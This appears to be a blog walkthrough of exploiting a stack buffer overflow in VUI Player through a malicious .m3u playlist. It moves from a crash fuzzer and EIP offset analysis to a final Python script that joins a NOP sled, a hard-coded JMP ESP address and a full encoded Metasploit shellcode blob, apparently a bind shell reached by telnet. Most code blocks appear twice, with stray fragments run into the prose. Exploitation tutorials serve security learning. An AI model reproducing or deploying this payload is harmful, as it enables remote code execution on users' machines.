First I try to create fuzzer
buffer += "\x41" * 1500;
filename = "vui" + ".m3u";
file = open(filename,"w")
file.writelines(buffer)
file.close()
I save it with fuzzvui.py, run with python, it work well to make VUI Player crash..
Then I try to make pattern character with pattern create, and replace the buffer with it, and try to analyze in what number of character EIP is overwritten with pattern offset, after that I make sure the EIP is overwritten, by changing the fuzzer script.
----------------------------
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit2" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
buffer += "\xD7\x30\x9D\x7C"
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit2" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
----------------------------
I run it, and load file .m3u with VUI attached with Ollydbg. It's work
...
Ok, Let's analyze the memory address..
Let's change fuzzer script into :
...........................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\xCC" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\xCC" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
...........................
To know what happen with EIP when we try to overwrite it with JMP ESP address..
Let's try again with breakpoint in JMP ESP address
The same thing happen, breakpoint not work..
Let's change fuzzer script again
.......................................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
And set the breakpoint
Change fuzzer scrip again. We try to add space between EIP addres and stack ...
.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
We also set breakpoint in JMP ESP memory address
.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += "\xCC" * 32
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += "\xCC" * 32
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
OK, it's work whe we try to add space "\x90" - NOP (No Operation) between EIP and stack.
So, let's try it with opcode metsploit to exploit Windows OD (the detail step to create it is in the previous article)
.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
Now, let's try open vuiploit.m3u created by the fuzzer in VUI Player.
Then, we try to telnet the target ...
0 komentar:
Post a Comment